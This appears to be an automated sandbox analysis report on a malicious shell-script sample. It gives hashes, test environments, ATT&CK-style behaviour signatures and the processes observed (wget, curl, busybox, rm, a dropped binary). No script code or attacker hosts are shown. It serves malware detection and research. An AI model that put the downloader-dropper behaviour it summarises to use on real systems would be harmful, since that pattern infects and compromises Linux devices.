Analysis
-
max time kernel
150s -
max time network
155s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
28/10/2024, 02:12
Static task
static1
Behavioral task
behavioral1
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
-
Size
10KB
-
MD5
5ecd8e3f2eb51a7dc020f24e33b8cc57
-
SHA1
be4322853738933aa75ef6ade68437e1c6290afe
-
SHA256
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f
-
SHA512
f43f15b94f1eab3f628a22d9dec691977126ced5801a808fc091f5847ab5cb1bf5bce49da1056fa82a1c14ccecddf1d0c76ecab6fcb74951c56b7c87a331dce1
-
SSDEEP
192:eyoVNmlHxyrasCqOpG+qpOVNmlHx3qOpG+0:e/VNmlRyrasH8VNmlRm
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 27 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 27 IoCs
-
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 870 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO 871 rm 921 curl 924 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO 922 busybox 925 rm 860 wget 864 curl 868 busybox 920 wget -
Writes file to tmp directory 27 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97